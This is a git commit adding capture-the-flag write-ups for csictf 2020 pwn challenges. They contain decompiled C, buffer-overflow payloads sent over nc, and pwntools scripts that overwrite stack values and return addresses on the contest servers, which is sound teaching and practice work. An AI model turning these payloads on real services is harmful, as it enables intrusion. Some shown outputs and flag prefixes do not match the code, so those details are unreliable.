Added Pwn Challenges

This commit is contained in:
rishitsaiya 2020-07-31 18:24:27 +05:30
parent 1e5c119ea1
commit 88ee32973e
11 changed files with 297 additions and 0 deletions

View File

@ -0,0 +1,10 @@
## Global Warming
The main idea finding the flag is `%n` exploit.
#### Step-1:
https://github.com/crypt0n1te/Write-Ups/blob/master/csictf-2020/pwn/global-warming.md
#### Step-5:
Finally the flag becomes:
`csictf{n0_5tr1ng5_@tt@ch3d}`

View File

@ -0,0 +1,84 @@
## Secret Society
The main idea finding the flag is Buffer Overflow.
#### Step-1:
After I downloaded `secret-society`, I reversed it with IDA, I got this source code:
**main()** function:
```c
undefined8 main(void)
{
size_t sVar1;
undefined8 local_d8 [2];
undefined4 uStack200;
undefined auStack196 [108];
char local_58 [56];
FILE *local_20;
char *local_18;
__gid_t local_c;
setvbuf(stdout,(char *)0x0,2,0);
local_c = getegid();
setresgid(local_c,local_c,local_c);
memset(local_58,0,0x32);
memset(local_d8,0,0x80);
puts("What is the secret phrase?");
fgets((char *)local_d8,0x80,stdin);
local_18 = strchr((char *)local_d8,10);
if (local_18 != (char *)0x0) {
*local_18 = '\0';
}
sVar1 = strlen((char *)local_d8);
*(undefined8 *)((long)local_d8 + sVar1) = 0x657261206577202c;
*(undefined8 *)((long)local_d8 + sVar1 + 8) = 0x6877797265766520;
*(undefined4 *)((long)&uStack200 + sVar1) = 0x2e657265;
auStack196[sVar1] = 0;
local_20 = fopen("flag.txt","r");
if (local_20 == (FILE *)0x0) {
printf("You are a double agent, it\'s game over for you.");
/* WARNING: Subroutine does not return */
exit(0);
}
fgets(local_58,0x32,local_20);
printf("Shhh... don\'t tell anyone else about ");
puts((char *)local_d8);
return 0;
}
```
#### Step-2:
So, basically I had to overflow 3 buffers in above code `local_d8 (16 bytes, our input buffer)`, `uStack200 (4 bytes)` & `auStack196 (108 bytes)`
So I tried using Debugger to get the address of the flag.
```bash
echo flag > flag.txt
perl -e 'print "A"x16 . "B"x4 . "C"x108' | ./secret-society
```
I got this output:
```bash
What is the secret phrase?
Shhh... don't tell anyone else about AAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC,flag
```
#### Step-3:
So, we just have to run this remotely on the web server.
```bash
perl -e 'print "A"x16 . "B"x4 . "C"x108' | nc chall.csivit.com 30041
```
I got this output:
```bash
What is the secret phrase?
Shhh... don't tell anyone else about AAAAAAAAAAAAAAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC,csivit{Bu!!er_e3pl01ts_ar5_5asy}
```
Voila! I got the flag there.
#### Step-4:
Finally the flag becomes:
`csivit{Bu!!er_e3pl01ts_ar5_5asy}`

View File

@ -0,0 +1 @@
flag

Binary file not shown.

View File

@ -0,0 +1,53 @@
## pwn intended 0x1
The main idea finding the flag is Buffer Overflow.
#### Step-1:
I reversed the file with Ghidra.
```c
undefined8 main(void)
{
char local_38 [44];
int local_c;
local_c = 0;
setbuf(stdout,(char *)0x0);
setbuf(stdin,(char *)0x0);
setbuf(stderr,(char *)0x0);
puts("Please pour me some coffee:");
gets(local_38);
puts("\nThanks!\n");
if (local_c != 0) {
puts("Oh no, you spilled some coffee on the floor! Use the flag to clean it.");
system("cat flag.txt");
}
return 0;
}
```
#### Step-2:
Clearly, this was a case for Buffer Overflow.
A simple command to overflow the buffer would give us the flag.
`python -c 'print"A"*45' | nc chall.csivit.com 30001`
<i> The piping done other way round doesn't help though. </i>
Output:
```bash
Please pour me some coffee:
Thanks!
Oh no, you spilled some coffee on the floor! Use the flag to clean it.
csictf{y0u_ov3rfl0w3d_th@t_c0ff33_l1ke_@_buff3r}
```
Voila! There we have our flag.
#### Step-3:
Finally the flag becomes:
`csictf{y0u_ov3rfl0w3d_th@t_c0ff33_l1ke_@_buff3r}`

Binary file not shown.

View File

@ -0,0 +1,63 @@
## pwn-intended-0x2
The main idea finding the flag is overwrite the correct hex after padding.
#### Step-1:
After I downloaded `pwn-intended-0x2`, I reversed it with IDA, I got this source code:
```c
undefined8 main(void)
{
char local_38 [44];
int local_c;
local_c = 0;
setbuf(stdout,(char *)0x0);
setbuf(stdin,(char *)0x0);
setbuf(stderr,(char *)0x0);
puts("Welcome to csictf! Where are you headed?");
gets(local_38);
puts("Safe Journey!");
if (local_c == -0x35014542) {
puts("You\'ve reached your destination, here\'s a flag!");
system("/bin/cat flag.txt");
}
return 0;
}
```
#### Step-2:
`local_c` is checked for a hex value of `0xcafebabe`. Since the size of local array is 44, we have to write `0xcafebabe` after 44 bytes.
#### Step-3:
I wrote a very common `rev_exploit.py` to pwn into the machine.
```python
import pwn
r = pwn.remote('chall.csivit.com', 30007)
payload = "A"*44 + '\xbe\xba\xfe\xca'
r.sendline(payload)
r.interactive()
```
#### Step-4:
When I finally ran this `python3 rev_exploit.py`, I got this output:
```bash
[+] Opening connection to chall.csivit.com on port 30007: Done
[*] Switching to interactive mode
Welcome to csictf! Where are you headed?
Safe Journey!
You've reached your destination, here's a flag!
csictf{c4n_y0u_re4lly_telep0rt?}[*] Got EOF while reading in interactive
$
[*] Interrupted
```
Voila! I got the flag there.
#### Step-5:
Finally the flag becomes:
`csictf{c4n_y0u_re4lly_telep0rt?}`

Binary file not shown.

View File

@ -0,0 +1,10 @@
#!/usr/bin/env python3
import pwn
r = pwn.remote('chall.csivit.com', 30007)
payload = "A"*44 + '\xbe\xba\xfe\xca'
r.sendline(payload)
r.interactive()

View File

@ -0,0 +1,76 @@
## pwn-intended-0x3
The main idea finding the flag is overwrite the correct hex after padding.
#### Step-1:
After I downloaded `pwn-intended-0x3`, I reversed it with IDA, I got this source code:
**main()** function:
```c
undefined8 main(void)
{
char local_28 [32];
setbuf(stdout,(char *)0x0);
setbuf(stdin,(char *)0x0);
setbuf(stderr,(char *)0x0);
puts("Welcome to csictf! Time to teleport again.");
gets(local_28);
return 0;
}
```
**flag()** function:
```c
void flag(void)
{
puts("Well, that was quick. Here\'s your flag:");
system("cat flag.txt");
/* WARNING: Subroutine does not return */
exit(0);
}
```
#### Step-2:
I just had to write the address of the flag function after 32+8 bytes.
So I tried using Debugger to get the address of the flag.
```bash
echo into functions | gdb ./pwn-intended-0x3 | grep flag
```
I got this output: `0x00000000004011ce flag`
#### Step-3:
I wrote a very common `rev_exploit.py` to pwn into the machine.
```python
import pwn
r = pwn.remote('chall.csivit.com', 30013)
payload = "A"*40 + '\xce\x11@\x00\x00\x00\x00\x00'
r.sendline(payload)
r.interactive()
```
#### Step-4:
When I finally ran this `python3 rev_exploit.py`, I got this output:
```bash
[+] Opening connection to chall.csivit.com on port 30013: Done
[*] Switching to interactive mode
Welcome to csictf! Time to teleport again.
Well, that was quick. Here's your flag:
You've reached your destination, here's a flag!
csictf{ch4lleng1ng_th3_v3ry_l4ws_0f_phys1cs}[*] Got EOF while reading in interactive
$
[*] Interrupted
```
Voila! I got the flag there.
#### Step-5:
Finally the flag becomes:
`csictf{ch4lleng1ng_th3_v3ry_l4ws_0f_phys1cs}`

Binary file not shown.